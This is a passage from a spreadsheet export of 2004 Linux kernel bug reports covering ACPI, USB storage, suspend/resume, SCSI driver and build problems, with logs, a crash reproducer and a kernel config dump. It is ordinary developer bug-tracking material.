AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0.PIB_.EC0_._Q20] (Node cfc0b4c0), AE_AML_UNINITIALIZED_LOCAL ACPI: Battery Slot [BAT1] (battery present) ACPI: AC Adapter [ACAD] (on-line) ACPI: Power Button (FF) [PWRF] ACPI: Sleep Button (CM) [SBTN] ACPI: Lid Switch [LID] ACPI: Thermal Zone [THRM] (59 C) apm: overridden by ACPI. Steps to reproduce: just boot!! I checked my dsdt table and it is NOT broken (0 errors, 0 warnings...) I haven't noticed this bug under the 2.6.3 (I am not sure at 100%) and I noticed it for the first time with I upgraded for 2.6.6 (at this time the message was displayed after ACPI: Battery Slot [BAT1] (battery present) ) Brice</t>
  </si>
  <si>
    <t>2.6.10-rc1</t>
  </si>
  <si>
    <t>USB mass storage camera Yakumo detected, no longer mountable</t>
  </si>
  <si>
    <t>2004-10-29 03:27 UTC</t>
  </si>
  <si>
    <t>Michele Alzetta</t>
  </si>
  <si>
    <t>2004-11-25 22:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo x86 Hardware Environment: cat /proc/cpuinfo: processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 6 model name : AMD Athlon(tm) Processor stepping : 2 cpu MHz : 1145.202 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mp mmxext 3dnowext 3dnow bogomips : 2260.99 lspci: 0000:00:00.0 Host bridge: Silicon Integrated Systems [SiS] 735 Host (rev 01) 0000:00:01.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) 0000:00:02.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) 0000:00:02.1 SMBus: Silicon Integrated Systems [SiS]: Unknown device 0016 0000:00:02.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 0000:00:02.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) 0000:00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) 0000:00:03.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 90) 0000:00:09.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 0000:00:0f.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 08) 0000:00:0f.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 08) 0000:01:00.0 VGA compatible controller: nVidia Corporation NV11 [GeForce2 MX/MX 400] (rev b2) Software Environment: kernel vanilla 2.6.9; glibc-2.3.4.20040808-r1 gcc-3.3.4-r1 udev Problem Description: with 2.6 kernels up to 2.6.7 connecting my Yakumo Digital Mega_Image VI camera caused /dev/sda1 tobe created, and I could mount the camera without any problems. With 2.6.8 and 2.6.9 kernels I get this in /var/log/kernel/current: Oct 29 12:22:07 [kernel] ohci_hcd 0000:00:02.3: wakeup Oct 29 12:22:08 [kernel] usb 2-1: new full speed USB device using address 2 Oct 29 12:22:08 [kernel] scsi0 : SCSI emulation for USB Mass Storage devices Oct 29 12:22:08 [kernel] USB Mass Storage device found at 2 Oct 29 12:22:08 [kernel] SCSI device sda: 28608 512-byte hdwr sectors (15 MB) Oct 29 12:22:08 [kernel] sda: Write Protect is off Oct 29 12:22:08 [kernel] SCSI error : &lt;0 0 0 0&gt; return code = 0x10070000 Oct 29 12:22:08 [kernel] Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0 This is output of lsmod a this point: sd_mod 11920 0 nvidia 4813076 12 emu10k1_gp 2624 0 gameport 3520 1 emu10k1_gp snd_emu10k1 91592 1 snd_rawmidi 20068 1 snd_emu10k1 snd_ac97_codec 68624 1 snd_emu10k1 snd_util_mem 3264 1 snd_emu10k1 snd_hwdep 7172 1 snd_emu10k1 8139too 20672 0 sis900 17092 0 sis_agp 5828 1 agpgart 27688 2 sis_agp snd_seq_oss 31552 0 snd_seq_midi_event 6144 1 snd_seq_oss snd_seq 49232 4 snd_seq_oss,snd_seq_midi_event snd_seq_device 6344 4 snd_emu10k1,snd_rawmidi,snd_seq_oss,snd_seq snd_pcm_oss 48296 0 snd_pcm 84680 2 snd_emu10k1,snd_pcm_oss snd_timer 21188 2 snd_seq,snd_pcm snd_page_alloc 7432 2 snd_emu10k1,snd_pcm snd_mixer_oss 17536 1 snd_pcm_oss snd 47140 13 snd_emu10k1,snd_rawmidi,snd_ac97_codec,snd_hwdep,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_pcm,snd_timer,snd_mixer_oss usb_storage 27776 0 scsi_mod 69760 2 sd_mod,usb_storage svgalib_helper 11364 0 usblp 10816 0 Steps to reproduce: If I plug in my camera and try mounting /dev/sda I get: mount: /dev/sda: impossibile leggere il superblocco NOTE: if I compile ub as a module, the camera is recognized as uba but I still can't mount it.</t>
  </si>
  <si>
    <t>poweroff no longer switch off the machine but reboots</t>
  </si>
  <si>
    <t>2.6.8.1-bk1</t>
  </si>
  <si>
    <t>2004-10-30 09:36 UTC</t>
  </si>
  <si>
    <t>GCS</t>
  </si>
  <si>
    <t>2004-12-10 09:46 UTC</t>
  </si>
  <si>
    <t>3405 3696</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge, up-to-date Hardware Environment: Gericom 1st Supersonic laptop, PIII 1200Mhz/512 Mb RAM Software Environment: N/A I think Problem Description: I have used the 2.4 series, switched to 2.6 when it was released. The halt command was working all kernels as I have always upgraded until 2.6.8.1. From 2.6.9 the machine reboots instead of halt. I could 'trace' it back to 2.6.8.1 + the first bk patch applied. If I remove all the ACPI update from -bk1 and apply only the rest, then it is still working, so the bug is in that ACPI update. Steps to reproduce: Compile a kernel which released _after_ 2.6.8.1 with ACPI enabled (APIC is disabled for me, but that does not matter in my case), boot and try to issue halt. The box will reboot instead, at least on this machine. My .config is the same I used for other 2.6.x kernels.</t>
  </si>
  <si>
    <t>S3 resume: no video - Sony S1XP</t>
  </si>
  <si>
    <t>2004-10-30 12:59 UTC</t>
  </si>
  <si>
    <t>Bastien Nocera</t>
  </si>
  <si>
    <t>2006-08-10 00:39 UTC</t>
  </si>
  <si>
    <t>605 1688 1721 1960 3168 3622</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: Sony S1XP Software Environment: in single user mode, with most modules removed Problem Description: After sending the machine in S3 mode, I cannot get the machine to wake up anymore, and have to remove the battery to power it back up. This might be related to bug #1730. Attached are the usual asked-for debug files.</t>
  </si>
  <si>
    <t>Unable to distinguish encrypted and plain packets</t>
  </si>
  <si>
    <t>2004-10-31 04:17 UTC</t>
  </si>
  <si>
    <t>2006-01-11 23:10 UTC</t>
  </si>
  <si>
    <t>Patrick McHardy</t>
  </si>
  <si>
    <t>Hi, I have setup an IPSEC tunnel to a peer network with isakmpd. In order to allow the packets from the peer network to be accepted or routed by the local router (linux), I have to use an iptables rule which accepts packets from that peer network. Unfortunately, there is no way to distinguish whether the packets came through the IPSEC tunnel or unencrypted from the internet. So every IPSEC tunnel also is an open hole in the iptables. Same for outgoing packets: When packets are sent to the peer network, but the IPSEC tunnel is not yet setup, packets are routed unencrypted to the internet. regards Hadmut</t>
  </si>
  <si>
    <t>Device 'i823650' does not have a release() function</t>
  </si>
  <si>
    <t>2.6.9-mm1</t>
  </si>
  <si>
    <t>2004-10-31 07:39 UTC</t>
  </si>
  <si>
    <t>2005-12-06 23:43 UTC</t>
  </si>
  <si>
    <t>Distribution: ArchLinux Hardware Environment: Thinkpad A31p Software Environment: i686 since upgrade to 2.6.9-mm1 PCMCIA is broken ("0 sockets found") dmesg says this: Device 'i823650' does not have a release() function, it is broken and must be fixed.</t>
  </si>
  <si>
    <t>Wrong temperature and battery status when running on battery</t>
  </si>
  <si>
    <t>&gt;= 2.6.7</t>
  </si>
  <si>
    <t>2004-11-01 05:20 UTC</t>
  </si>
  <si>
    <t>Fred Labrosse</t>
  </si>
  <si>
    <t>2005-03-14 19:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ACER TM 636 Problem Description: Fro kernel 2.6.7 included, when my ACER TM 636 runs on battery, the battery and temperature status returned by ACPI are wrong. This does not happen when running on AC. Possibly related (and related to bug id=3669) when this happens, then /sbin/halt does not halt the laptop but just displays "Power down". (When all is normal, it behaves as reported in bug id=3669.) I have tried with ACPI as modules or in the kernel without any difference. I have tried with and without cpu-freq, without any difference. I have tried with a config file from a similar laptop not behaving like mine, and mine still does it. However, all works fine in 2.6.6 and previous. Steps to reproduce: It systematically happens. Just unplug the laptop and monitor or not the temperature and battery status. It will start happenig after a few minutes.</t>
  </si>
  <si>
    <t>sym53c8xx_2 SMP deadlock on driver load</t>
  </si>
  <si>
    <t>2004-11-01 13:59 UTC</t>
  </si>
  <si>
    <t>Anthony J. Battersby</t>
  </si>
  <si>
    <t>2007-10-17 12:02 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: Dual-processor system 2 dual channel LSI Logic 53c1010 SCSI cards Software Environment: SMP kernel 2.4.x Problem Description: Originally reported May 2003: http://marc.theaimsgroup.com/?l=linux-scsi&amp;m=105404875212559&amp;w=2 http://marc.theaimsgroup.com/?l=linux-scsi&amp;m=105457234810528&amp;w=2 The sym53c8xx_2 driver holds a spinlock (io_request_lock) while calling ioremap () and iounmap(), which can cause a deadlock when loading the driver on a SMP system. The first URL above gives the full problem description with oopses. The second URL gives a cheesy workaround to avoid the deadlock, but is not really a proper solution. Steps to reproduce: Plug two dual-channel LSI Logic 53c1010 SCSI cards in a SMP system modprobe sym53c8xx_2</t>
  </si>
  <si>
    <t>SCSI generic driver (sg) BUG(): direct I/O + exit()</t>
  </si>
  <si>
    <t>2004-11-02 06:48 UTC</t>
  </si>
  <si>
    <t>2007-09-10 08:59 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: x86 SCSI adapter Software Environment: SMP kernel 2.4.x Original bug report: http://marc.theaimsgroup.com/?t=108005442700006&amp;r=1&amp;w=2 Problem Description: The following BUG() is triggered in 2.4.x when a program calls exit() immediately after sending a SCSI command that uses direct IO: kernel BUG at page_alloc.c:98! invalid operand: 0000 sg sym53c8xx_2 e1000 CPU: 0 EIP: 0010:[&lt;c0133d22&gt;] Not tainted EFLAGS: 00010202 EIP is at __free_pages_ok+0x32/0x2b0 [kernel] eax: 00000001 ebx: c12aceb0 ecx: c12aceb0 edx: 00000000 esi: 00000000 edi: 00000000 ebp: 00000001 esp: c02bbe94 ds: 0018 es: 0018 ss: 0018 Process swapper (pid: 0, stackpage=c02bb000) Stack: cfefc640 cfdf2de8 cfbe93c0 cfefc600 00000001 00000000 cfefc600 c12aceb0 cf926fa0 00000000 cfb8b040 c0127cb0 cfb8b04c cfb8b04c cfb8b000 d0885db6 cf926fa0 00000000 cfb8b040 d0885cc9 cfb8b04c 00000001 cfd08680 cfd086c8 Call Trace: [&lt;c0127cb0&gt;] unmap_kiobuf+0x30/0x50 [kernel] [&lt;d0885db6&gt;] sg_unmap_and+0x26/0x50 [sg] [&lt;d0885cc9&gt;] sg_finish_rem_req+0x39/0x70 [sg] [&lt;d0885451&gt;] sg_cmd_done_bh+0x281/0x380 [sg] [&lt;c01ab65a&gt;] scsi_finish_command+0xda/0xe0 [kernel] [&lt;c01ab380&gt;] scsi_bottom_half_handler+0xc0/0x230 [kernel] [&lt;c011dacb&gt;] bh_action+0x4b/0x90 [kernel] [&lt;c011d971&gt;] tasklet_hi_action+0x61/0xa0 [kernel] [&lt;c011d6fb&gt;] do_softirq+0x6b/0xd0 [kernel] [&lt;c0108baf&gt;] do_IRQ+0xdf/0xf0 [kernel] [&lt;c01052c0&gt;] default_idle+0x0/0x40 [kernel] [&lt;c01052c0&gt;] default_idle+0x0/0x40 [kernel] [&lt;c010b388&gt;] call_do_IRQ+0x5/0xd [kernel] [&lt;c01052c0&gt;] default_idle+0x0/0x40 [kernel] [&lt;c01052c0&gt;] default_idle+0x0/0x40 [kernel] [&lt;c01052ec&gt;] default_idle+0x2c/0x40 [kernel] [&lt;c0105372&gt;] cpu_idle+0x52/0x70 [kernel] [&lt;c0105000&gt;] stext+0x0/0x50 [kernel] Code: 0f 0b 62 00 ab 04 23 c0 89 d8 e8 2f ed ff ff 8b 7b 28 85 ff &lt;0&gt;Kernel panic: Aiee, killing interrupt handler! In interrupt handler - not syncing The problem is that unmap_kiobuf is called from interrupt context but should only be called from process context. To fix the problem, the sg driver should block the close() of the /dev/sg* file descriptor until all commands that use direct I/O have finished, rather than allowing the process to exit and cleaning up asynchronously. See the URL above for more information. Steps to reproduce: The following program reproduces the problem: #include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;unistd.h&gt; #include &lt;scsi/sg.h&gt; #include &lt;limits.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/stat.h&gt; #include &lt;fcntl.h&gt; unsigned char mode_sense_cdb[] = { 0x1a, 0x00, 0x3f, 0x00, 0xff, 0x00 }; int main(int argc, char *argv[]) { int fd; unsigned char sense_data[256]; unsigned char buf[256]; sg_io_hdr_t io; fd = open("/dev/sg0", O_RDWR); if (fd == -1) { perror("open(/dev/sg0)"); exit(1); } memset(&amp;io, 0, sizeof(sg_io_hdr_t)); io.interface_id = 'S'; io.timeout = UINT_MAX; io.flags = SG_FLAG_DIRECT_IO; io.sbp = sense_data; io.mx_sb_len = 0xff; io.cmdp = mode_sense_cdb; io.cmd_len = 6; io.dxfer_direction = SG_DXFER_FROM_DEV; io.dxferp = buf; io.dxfer_len = 0xff; write(fd, &amp;io, sizeof(sg_io_hdr_t)); return 0; } Just compile, echo 1 &gt; /proc/scsi/sg/allow_dio, and run. The SCSI device that I am using is a tape drive, but it shouldn't matter.</t>
  </si>
  <si>
    <t>ipw2200 freezes input after suspend - Asus S5609N</t>
  </si>
  <si>
    <t>2004-11-03 04:05 UTC</t>
  </si>
  <si>
    <t>Runar Ingebrigtsen</t>
  </si>
  <si>
    <t>2005-09-12 23:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: Asus S5609N of the S5N series 12" display Intel(R) Celeron(R) M processor 1200MHz, cache size 512 KB 256 MB RAM 30 GB HDD AMIBIOS: version 0211, v. 2.33 &gt; Looks like this box is using the Embedded Intel 855GME internal graphics. (II) Loading /usr/X11R6/lib/modules/drivers/i810_drv.o Software Environment: ipw2200 RPMS from ATRPMS. ACPI setup, see attachments. Kernel booted with "acpi_sleep=s3_bios" asus_acpi module loaded. Problem Description: Switching to a different virtual terminal than the one running X when downloading a large file over the wireless connection freezes input. This only happens if I've suspended the laptop before I'm starting the download. Holding the power button for 10 secs immediately cuts the power. Steps to reproduce: 1. install ipw2200 RPMS from ATRPMS 2. configure acpi 3. suspend using hotkeys 4. resume using power button 5. download something BIG from an X browser 6. Ctrl+Alt+1 to switch to a different VT</t>
  </si>
  <si>
    <t>if nls iso8859-13 is compiled into kernel it is not found</t>
  </si>
  <si>
    <t>2004-11-04 03:47 UTC</t>
  </si>
  <si>
    <t>richlv</t>
  </si>
  <si>
    <t>2005-02-01 00:29 UTC</t>
  </si>
  <si>
    <t>Andries Brouwer</t>
  </si>
  <si>
    <t>Distribution: slackware Hardware Environment: fujitsu-siemens lifebook c-1020 Software Environment: Problem Description: 2.6.9 with vfat support, nls iso-8859-13 compiled into kernel. when trying to mount fat32 filesystem : Oct 23 22:57:25 is kernel: Unable to load NLS charset iso8859-13 Oct 23 22:57:25 is kernel: FAT: IO charset iso8859-13 not found there was no such problem with 2.6.7. if this component is compiled as a module, it is found, loaded, and filesystem is mounted.</t>
  </si>
  <si>
    <t>aacraid unchecked kmallocs</t>
  </si>
  <si>
    <t>2004-11-04 08:47 UTC</t>
  </si>
  <si>
    <t>Matt Domsch</t>
  </si>
  <si>
    <t>2005-07-19 15:21 UTC</t>
  </si>
  <si>
    <t>Distribution: scsi-misc-2.6 BK tree Hardware Environment: Software Environment: Problem Description: unchecked kmallocs in aacraid driver static int aac_rkt_check_health(struct aac_dev *dev) { [snip] if (status &amp; KERNEL_PANIC) { char * buffer = kmalloc(512, GFP_KERNEL|__GFP_DMA); struct POSTSTATUS { u32 Post_Command; u32 Post_Address; } * post = kmalloc(sizeof(struct POSTSTATUS), GFP_KERNEL); static int aac_rx_check_health(struct aac_dev *dev) { [snip] if (status &amp; KERNEL_PANIC) { char * buffer = kmalloc(512, GFP_KERNEL); struct POSTSTATUS { u32 Post_Command; u32 Post_Address; } * post = kmalloc(sizeof(struct POSTSTATUS), GFP_KERNEL);</t>
  </si>
  <si>
    <t>S3 resume - audio stops - Asus S5609N</t>
  </si>
  <si>
    <t>2004-11-04 11:29 UTC</t>
  </si>
  <si>
    <t>2005-09-12 23:27 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Hardware Environment: Asus S5609N of the S5N series 12" display Intel(R) Celeron(R) M processor 1200MHz, cache size 512 KB 256 MB RAM 30 GB HDD AMIBIOS: version 0211, v. 2.33 &gt; Looks like this box is using the Embedded Intel 855GME internal graphics. (II) Loading /usr/X11R6/lib/modules/drivers/i810_drv.o Software Environment: ipw2200 RPMS from ATRPMS. ACPI setup, see attachments. Kernel booted with "acpi_sleep=s3_bios" asus_acpi module loaded. Problem Description: When playing sounds after suspend only 1/10th of the first second of the stream is played before the playback stops. Steps to reproduce: Steps 1-4 of bug #3689 5. Play any sound file</t>
  </si>
  <si>
    <t>Kernel build fails on sungem driver compile.</t>
  </si>
  <si>
    <t>2004-11-05 14:23 UTC</t>
  </si>
  <si>
    <t>Jathan McCollum</t>
  </si>
  <si>
    <t>2004-12-21 17:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 2004.3 Hardware Environment: 2nd Gen PowerMac G5 (2 x 1.8GHz, 160GB HD, 1.5GB RAM) Software Environment: Linux rebot 2.6.9-gentoo-r1 #1 SMP Sat Oct 23 22:34:45 UTC 2004 ppc64 PPC970, altivec supported PowerMac7,3 GNU/Linux Problem Description: Make fails like so: rebot linux-2.6.10-rc1 # make CHK include/linux/version.h make[1]: `arch/ppc64/kernel/asm-offsets.s' is up to date. CHK include/linux/compile.h GEN_INITRAMFS_LIST usr/initramfs_list Using shipped usr/initramfs_list GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o(.text+0xc3520): In function `.gem_init_one': : undefined reference to `.get_gem_mac_nonobp' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: Try to make using this .config: rebot linux-2.6.10-rc1 # cat .config # # Automatically generated make config: don't edit # Linux kernel version: 2.6.10-rc1 # Fri Nov 5 17:08:31 2004 # CONFIG_64BIT=y CONFIG_MMU=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_GENERIC_ISA_DMA=y CONFIG_HAVE_DEC_LOCK=y CONFIG_EARLY_PRINTK=y CONFIG_COMPAT=y CONFIG_FRAME_POINTER=y CONFIG_FORCE_MAX_ZONEORDER=13 # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y # # General setup # CONFIG_LOCALVERSION="" CONFIG_SWAP=y CONFIG_SYSVIPC=y # CONFIG_POSIX_MQUEUE is not set # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_LOG_BUF_SHIFT=17 CONFIG_HOTPLUG=y CONFIG_KOBJECT_UEVENT=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_ALL is not set # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_FUTEX=y CONFIG_EPOLL=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set CONFIG_SHMEM=y # CONFIG_TINY_SHMEM is not set # # Loadable module support # # CONFIG_MODULES is not set CONFIG_SYSVIPC_COMPAT=y # # Platform support # # CONFIG_PPC_ISERIES is not set CONFIG_PPC_MULTIPLATFORM=y CONFIG_PPC_PSERIES=y # CONFIG_PPC_PMAC is not set CONFIG_PPC=y CONFIG_PPC64=y CONFIG_PPC_OF=y CONFIG_ALTIVEC=y # CONFIG_PPC_SPLPAR is not set # CONFIG_U3_DART is not set # CONFIG_BOOTX_TEXT is not set # CONFIG_POWER4_ONLY is not set # CONFIG_IOMMU_VMERGE is not set CONFIG_SMP=y CONFIG_IRQ_ALL_CPUS=y CONFIG_NR_CPUS=32 # CONFIG_HMT is not set # CONFIG_DISCONTIGMEM is not set # CONFIG_SCHED_SMT is not set # CONFIG_PREEMPT is not set CONFIG_GENERIC_HARDIRQS=y CONFIG_PPC_RTAS=y CONFIG_RTAS_FLASH=y CONFIG_SCANLOG=y CONFIG_LPARCFG=y # # General setup # CONFIG_PCI=y CONFIG_PCI_DOMAINS=y CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_MISC is not set CONFIG_PCI_LEGACY_PROC=y CONFIG_PCI_NAMES=y # CONFIG_HOTPLUG_CPU is not set # # PCCARD (PCMCIA/CardBus) support # # CONFIG_PCCARD is not set # # PC-card bridges # # # PCI Hotplug Support # CONFIG_HOTPLUG_PCI=y # CONFIG_HOTPLUG_PCI_FAKE is not set # CONFIG_HOTPLUG_PCI_CPCI is not set # CONFIG_HOTPLUG_PCI_PCIE is not set # CONFIG_HOTPLUG_PCI_SHPC is not set CONFIG_HOTPLUG_PCI_RPA=y CONFIG_HOTPLUG_PCI_RPA_DLPAR=y CONFIG_PROC_DEVICETREE=y # CONFIG_CMDLINE_BOOL is not set # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=y # CONFIG_DEBUG_DRIVER is not set # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # # CONFIG_PARPORT is not set # # Plug and Play support # # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set CONFIG_BLK_DEV_NBD=y # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=4096 CONFIG_BLK_DEV_INITRD=y CONFIG_INITRAMFS_SOURCE="" # CONFIG_CDROM_PKTCDVD is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set CONFIG_BLK_DEV_SL82C105=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set CONFIG_BLK_DEV_AMD74XX=y # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=y CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=y CONFIG_CHR_DEV_ST=y # CONFIG_CHR_DEV_OSST is not set CONFIG_BLK_DEV_SR=y CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=y # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_CONSTANTS=y # CONFIG_SCSI_LOGGING is not set # # SCSI Transport Attributes # CONFIG_SCSI_SPI_ATTRS=y CONFIG_SCSI_FC_ATTRS=y # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_3W_9XXX is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AACRAID is not set # CONFIG_SCSI_AIC7XXX is not set # CONFIG_SCSI_AIC7XXX_OLD is not set # CONFIG_SCSI_AIC79XX is not set # CONFIG_MEGARAID_NEWGEN is not set # CONFIG_MEGARAID_LEGACY is not set # CONFIG_SCSI_SATA is not set # CONFIG_SCSI_BUSLOGIC is not set # CONFIG_SCSI_DMX3191D is not set # CONFIG_SCSI_EATA is not set # CONFIG_SCSI_EATA_PIO is not set # CONFIG_SCSI_FUTURE_DOMAIN is not set # CONFIG_SCSI_GDTH is not set # CONFIG_SCSI_IPS is not set # CONFIG_SCSI_IBMVSCSI is not set # CONFIG_SCSI_INITIO is not set # CONFIG_SCSI_INIA100 is not set CONFIG_SCSI_SYM53C8XX_2=y CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=0 CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16 CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64 # CONFIG_SCSI_SYM53C8XX_IOMAPPED is not set # CONFIG_SCSI_IPR is not set # CONFIG_SCSI_QLOGIC_ISP is not set # CONFIG_SCSI_QLOGIC_FC is not set # CONFIG_SCSI_QLOGIC_1280 is not set # CONFIG_SCSI_QLOGIC_1280_1040 is not set CONFIG_SCSI_QLA2XXX=y CONFIG_SCSI_QLA21XX=y CONFIG_SCSI_QLA22XX=y CONFIG_SCSI_QLA2300=y CONFIG_SCSI_QLA2322=y CONFIG_SCSI_QLA6312=y CONFIG_SCSI_QLA6322=y # CONFIG_SCSI_DC395x is not set # CONFIG_SCSI_DC390T is not set # CONFIG_SCSI_DEBUG is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Macintosh device drivers # # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set # CONFIG_NETLINK_DEV is not set CONFIG_UNIX=y CONFIG_NET_KEY=y CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set CONFIG_NET_IPIP=y # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set # CONFIG_ARPD is not set CONFIG_SYN_COOKIES=y CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y CONFIG_INET_TUNNEL=y # # IP: Virtual Server Configuration # # CONFIG_IP_VS is not set # CONFIG_IPV6 is not set CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=y # CONFIG_IP_NF_CT_ACCT is not set # CONFIG_IP_NF_CONNTRACK_MARK is not set # CONFIG_IP_NF_CT_PROTO_SCTP is not set CONFIG_IP_NF_FTP=y CONFIG_IP_NF_IRC=y CONFIG_IP_NF_TFTP=y CONFIG_IP_NF_AMANDA=y CONFIG_IP_NF_QUEUE=y CONFIG_IP_NF_IPTABLES=y CONFIG_IP_NF_MATCH_LIMIT=y CONFIG_IP_NF_MATCH_IPRANGE=y CONFIG_IP_NF_MATCH_MAC=y CONFIG_IP_NF_MATCH_PKTTYPE=y CONFIG_IP_NF_MATCH_MARK=y CONFIG_IP_NF_MATCH_MULTIPORT=y CONFIG_IP_NF_MATCH_TOS=y CONFIG_IP_NF_MATCH_RECENT=y CONFIG_IP_NF_MATCH_ECN=y CONFIG_IP_NF_MATCH_DSCP=y 